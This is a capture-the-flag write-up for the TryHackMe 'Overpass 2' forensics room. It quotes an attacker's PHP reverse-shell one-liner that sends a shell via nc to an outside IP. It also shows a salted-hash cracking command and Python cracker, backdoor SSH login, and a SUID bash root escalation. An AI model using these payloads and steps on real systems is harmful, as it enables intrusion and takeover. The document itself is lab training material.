TryHackMe-Overpass 2

A forensics room that involves analysing how the attackers got into the system and tracing their activity.

What was the URL of the page they used to upload a reverse shell? /development

What payload did the attacker use to gain access?

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

What password did the attacker use to privesc?

whenevernoteartinstant

How did the attacker establish persistence?

https://github.com/NinjaJc01/ssh-backdoor

Using the fasttrack wordlist, how many of the system passwords were crackable?

4


What’s the default hash for the backdoor?

(Clone the ssh-backdoor GitHub repository first, then open its main.go file.)

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

What’s the hardcoded salt for the backdoor?

1c362db832f3f864c8c2fe05f2002a05

What was the hash that the attacker used? — go back to the PCAP for this!

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

In main.go, the hashPassword function computes SHA-512 over the password with the salt appended, i.e. sha512(password + salt), and prints the digest as hex.

Plain john or CrackStation won't help, because the salt has to be appended to every candidate before hashing. So we look for the matching salted format in hashcat:

hashcat --help lists all hash modes; mode 1710 is sha512($pass.$salt), which is exactly this scheme, so we use it.

The command is:

hashcat -m 1710 -a 0 -o outputfile.txt hashfile.txt passwordlist.txt

The hash file (heshh.txt in my case) must contain the hash and the hard-coded salt separated by a colon:

password hash:hardcoded salt

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05

(If you are confused, look at the answers above)

Once it finishes, the cracked password is written to the output file (crackpass.txt in my case): november16
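The same attack in Python, as an added example that is not part of the original writeup: it reproduces the sha512(password + salt) scheme described above (hashcat mode 1710), builds the hash:salt line hashcat expects, and runs a dictionary attack against the hash from the PCAP using the hard-coded salt. SAMPLE_WORDLIST is a constructed stand-in for rockyou.txt; crack_from_file shows how to stream the real file.

```python
import hashlib
from typing import Iterable, Optional

# Values taken from the writeup above (hash from the PCAP, salt from main.go).
BACKDOOR_HASH = "6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed"
HARDCODED_SALT = "1c362db832f3f864c8c2fe05f2002a05"

# Constructed mini wordlist standing in for rockyou.txt; not data from the room.
SAMPLE_WORDLIST = ["password", "123456", "summer2020", "letmein", "november16", "qwerty"]


def hash_password(password: str, salt: str) -> str:
    """sha512(password + salt) as lowercase hex.

    Mirrors the scheme the writeup identifies in the backdoor's hashPassword
    function, which is what hashcat calls mode 1710 (sha512($pass.$salt)).
    The salt is appended, not prepended: sha512($salt.$pass) is mode 1720
    and would never match this hash.
    surrogateescape round-trips raw wordlist bytes that are not valid UTF-8.
    """
    data = (password + salt).encode("utf-8", "surrogateescape")
    return hashlib.sha512(data).hexdigest()


def hashcat_line(target_hex: str, salt: str) -> str:
    """The hash:salt line that hashcat -m 1710 expects in the hash file."""
    return f"{target_hex}:{salt}"


def crack(target_hex: str, salt: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack (hashcat -a 0): salt and hash each candidate, compare
    against the target. Returns the first matching word, or None."""
    target = target_hex.strip().lower()
    for word in candidates:
        word = word.rstrip("\r\n")  # wordlist lines carry their newline
        if hash_password(word, salt) == target:
            return word
    return None


def crack_from_file(target_hex: str, salt: str, wordlist_path: str) -> Optional[str]:
    """Same attack streaming a real wordlist such as rockyou.txt, which
    contains lines that are not valid UTF-8; surrogateescape keeps the raw bytes."""
    with open(wordlist_path, "r", encoding="utf-8", errors="surrogateescape") as fh:
        return crack(target_hex, salt, fh)


if __name__ == "__main__":
    print("hash file line for hashcat -m 1710:")
    print(hashcat_line(BACKDOOR_HASH, HARDCODED_SALT))
    # An unsalted lookup (what CrackStation would try) cannot match the backdoor hash.
    print("unsalted match:", hash_password("november16", "") == BACKDOOR_HASH)
    print("cracked:", crack(BACKDOOR_HASH, HARDCODED_SALT, SAMPLE_WORDLIST))
```

Running it prints the hash:salt line to paste into the hash file and the cracked password from the constructed list; point crack_from_file at rockyou.txt to reproduce the hashcat run, which takes noticeably longer in pure Python than on a GPU but gives the same answer.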

The attacker defaced the website. What message did they leave as a heading?

H4ck3d by CooctusClan

This part was a bit confusing. I tried to run the ./backdoor command (as left by the attacker in the PCAP) but was unable to get in.

An nmap scan showed ports 22 and 2222 open, both running SSH. I tried connecting to port 22 with both november16 and whenevernoteartinstant but could not get in.

Connecting to SSH on port 2222 instead, using the -p option to specify the port (ssh -p 2222), does get us in; that is where the ssh-backdoor is listening.

The user flag can be found in /home/james directory

I also looked around /var/www/html, which often holds configuration files and other useful information, and checked index.html, but nothing there was useful.

Running sudo -l to list the commands we can execute asks for a password, so we move on.

ls -la shows a root-owned executable named .suid_bash (highlighted in red). You can also run linpeas, or use find to locate SUID files as I did.

Searching GTFOBins for "bash" and selecting the SUID entry gives the command

./bash -p

When bash starts with an effective UID that differs from the real UID it normally drops back to the real UID; the -p (privileged mode) option keeps the effective UID, so a SUID copy of bash stays running as root.

Run the command ./.suid_bash -p

This spawns a root bash shell. Change directory to /root and read the root flag: cd /root, then cat root.txt
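The SUID enumeration step in Python, as an added example that is not part of the original writeup: find_suid is the equivalent of find / -type f -perm -4000 2>/dev/null, and is_suspicious flags SUID files that sit outside the usual system directories or have hidden names, which is exactly how /home/james/.suid_bash stands out. EXPECTED_SUID_DIRS is my own assumption about a stock layout, and demo() plants constructed files in a scratch directory so the check can be exercised offline.

```python
import os
import stat
import tempfile
from typing import List, Tuple

# Assumed locations where root-owned SUID binaries are expected on a stock system.
# Anything elsewhere (a home directory, /tmp, a dotfile) deserves a closer look.
EXPECTED_SUID_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")
# Pseudo filesystems that only slow the walk down.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def has_suid(mode: int) -> bool:
    """True if the permission bits include setuid (the 4000 in -perm -4000)."""
    return bool(mode & stat.S_ISUID)


def is_suspicious(path: str) -> bool:
    """Flag SUID files with hidden names or in non-standard locations,
    like /home/james/.suid_bash in the writeup."""
    name = os.path.basename(path)
    return name.startswith(".") or not path.startswith(EXPECTED_SUID_DIRS)


def find_suid(root: str, root_owned_only: bool = False) -> List[Tuple[str, int]]:
    """Walk root and return (path, owner uid) for every regular file with the
    setuid bit set. Symlinks are not followed (lstat) and unreadable
    directories are ignored, mirroring 2>/dev/null on the find command."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and has_suid(st.st_mode):
                if root_owned_only and st.st_uid != 0:
                    continue
                hits.append((path, st.st_uid))
    return sorted(hits)


def demo() -> List[str]:
    """Plant a setuid file and a plain file in a scratch directory (constructed
    test data) and return the basenames that find_suid reports."""
    with tempfile.TemporaryDirectory() as tmp:
        suid_path = os.path.join(tmp, ".suid_bash")
        plain_path = os.path.join(tmp, "notes.txt")
        for p in (suid_path, plain_path):
            with open(p, "w") as fh:
                fh.write("#!/bin/bash\n")
        os.chmod(suid_path, 0o4755)  # rwsr-xr-x, the mode ls -la shows in red
        os.chmod(plain_path, 0o644)
        return [os.path.basename(p) for p, _uid in find_suid(tmp)]


if __name__ == "__main__":
    # Only root-owned SUID files can give a root shell; print and mark the odd ones.
    for path, uid in find_suid("/", root_owned_only=True):
        marker = "  <-- check this" if is_suspicious(path) else ""
        print(f"{path} (uid {uid}){marker}")
```

Running the script on the target lists every root-owned SUID file and marks the ones worth checking against GTFOBins; the setuid bit alone is not a finding, it is the combination of root ownership, an unexpected location and a binary with a known privileged-mode escape (bash -p here) that gives the privesc.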

This was a pretty fun room and different from the usual ones. I hope you learned something from this writeup. - ZEUS

I am a penetration tester currently pursuing OSCP, skilled in network pentesting and developing hacking tools in Python. I share my knowledge on YouTube.